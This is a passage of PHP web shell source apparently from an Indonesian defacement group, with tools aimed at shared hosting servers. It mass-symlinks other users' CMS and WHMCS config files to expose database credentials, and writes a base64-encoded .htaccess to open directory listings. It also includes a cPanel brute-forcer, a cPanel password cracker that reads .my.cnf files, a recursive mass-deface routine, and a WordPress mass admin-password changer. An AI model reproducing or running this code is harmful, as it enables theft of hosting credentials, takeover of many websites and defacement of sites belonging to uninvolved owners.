symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=springgreen size=3>Done</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  396.             aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  397.             biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  398.             '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=springgreen size=3>Done</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
  399.             <form method="POST" target="_blank">
  400.             <input name="page" type="hidden" value="find">
  401.                 <table border=1>
  402.                 <body bgcolor="black" text="white"><br><br>
  403.  
  404.                 <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
  405.                 <tr>
  406.                 <td>
  407.                 <strong>User :</strong>
  408.                 </td>
  409.                 <td>
  410.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
  411.                 </td>
  412.                 <tr>
  413.                 <td>
  414.                 <strong>Pass :</strong>
  415.                 </td>
  416.                 <td>
  417.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
  418.                 </td>
  419.                 </tr>
  420.                 <tr>
  421.                 <td>
  422.                 <strong>Type :</strong>
  423.                 </td>
  424.                 <td>
  425.                 <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
  426.                 <strong>
  427.                 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  428.                 <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
  429.                 <strong>
  430.                 <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
  431.                 </strong>
  432.                 </span>
  433.                 <td style="background:black;outline:none;color:white;"  >
  434.                 <strong><input class ='bordergaya' type="submit" value="START"></strong>
  435.                 </td>
  436.                 </tr>
  437.                 </table>
  438.                 <br>
  439.                 <table border=1>
  440.             </form>
  441.             <tr>
  442.                 <td style="background:black;outline:none;color:white;">
  443.                     <strong>Get Wordlist</strong>
  444.             <form method="POST" target="_blank">
  445.                 <strong>
  446.             <input name="pass" type="hidden" value="password">
  447.                 </strong>
  448.                 <strong>Url Config :</strong>
  449.                 <td>
  450.  
  451.                 <strong>
  452.                     <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
  453.  
  454.                 <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
  455.                 </strong>
  456.                 </td>
  457.                 </table>
  458.                 <?php  echo"<br/><br/>"; die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'massde')) { ?></center></center>
  459. <style type="text/css">
  460.     .ketengah{
  461.     text-align: left;
  462.     font-size: 16px;
  463.     color: orange;
  464.     font-family: Homenaje;
  465.     margin-left: 18%;
  466. </style>
  467. <?php  function sabun_massal($path,$namafile,$isi_script) { if(is_writable($path)) { $patha = scandir($path); foreach($patha as $pathb) { $pathc = "$path/$pathb"; $lokasi = $pathc.'/'.$namafile; if($pathb === '.') { file_put_contents($lokasi, $isi_script); } elseif($pathb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($pathc)) { if(is_writable($pathc)) { echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>done  Bos</font><font color=crimson>-:-</font> <font color=springgreen>
  468. Check dir :</font> $lokasi</font><br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($pathc,$namafile,$isi_script); } } } } } } if($_POST['start']) { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } else { echo "<center>"; echo "<form method='post'><br><br>
  469.     <table>
  470.     <tr>
  471.         <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
  472.         <td align='center'>:</td>
  473.         <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
  474.     </tr>
  475.     <tr>
  476.         <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
  477.         <td align='center'>:</td>
  478.         <td><input class='justborder' type='text' name='d_file' value='Haxor.html' style='width: 95%;' height='10'><br></td>
  479.     </tr>
  480.     <tr>
  481.     <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
  482.     </tr>
  483.     <tr>
  484.     <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Optimus  || ErrOr SquaD Bangladesh !</textarea><br></td>
  485.     </tr>
  486.     <tr>
  487.     <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
  488.     </tr>
  489.     </table><br><br><br>
  490.     </form></center><br/>"; }die();?><center><center><?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc')) { ?>
  491.                 <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
  492.                 <?php  set_time_limit(0); ini_set('display_errors', 0); echo '<center><h2>WordPress Mass Password Changer</h2></center>'; echo '<form method="POST" action="" >
  493.             <center><table border="1" class="justborder"><tr><td>Config List:</td>
  494.             <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
  495.             <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
  496.             <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
  497.             <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>'; if ($_POST['action']=='1'){ if ($_POST['url']==''){ echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>"; }else{ $url=$_POST['url']; $users = explode("\n",$url); foreach ($users as $user) { $user1=trim($user); $code=file_get_contents2($user1); preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1); $db=$b1[1][0]; preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2); $user=$b2[1][0]; preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3); $db_password=$b3[1][0]; preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4); $host=$b4[1][0]; preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5); $p=$b5[1][0]; $d=@mysql_connect( $host, $user, $db_password ) ; if ($d){ @mysql_select_db($db ); $usern=$_POST['username']; $passwd=$_POST['password']; $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';"; @mysql_query($sql) ; ; $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';"; @mysql_query($sql) ; ; $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;; $siteurl=@mysql_fetch_array($aa) ; $siteurl=$siteurl['option_value']; $tr.="$siteurl\n"; mysql_close(); } } if ($tr) $filename = 'changed.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $tr); fclose($fp); echo "<div class='result'>Password Changing Completed ! :)<br><br>"; echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>"; } } function file_get_contents2($u){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$u); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 "); $result = curl_exec($ch); return $result ; } echo "<br /><br />"; die(); ?>
  498.                 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool')) { echo "<br/><br/>Monggo Choose Tools Boss ^_^<br/><br/>"; ?>
  499.                     <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
  500.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
  501.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
  502.                     <br/><br/><br/><br/><br/>
  503.  
  504.                     <?php  die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang')) { echo"<br><br>
  505.                     <center><b>
  506.             <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
  507.                     <br>
  508.             <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^  &hearts;<br><br>
  509.             -:- No Leader We Just Laugh Together -:-</font><br><br>
  510.             <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
  511.             </center>
  512.                     </b>"; die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')) { echo "<br/><br/>Choose Tools Boss ^_^<br/><br/>"; ?>
  513.  
  514.                     <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
  515.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
  516.                     <br/><br/><br/><br/>
  517.                 <?php die(); ?>
  518.  
  519.                 <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack')) { ?>
  520.                             <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
  521.                 <?php  @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo '<h1>Cpanel Finder/Cracker</h1><br/>'; echo "<center>"; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; } } } echo '</table>'; $total = $dc; echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf 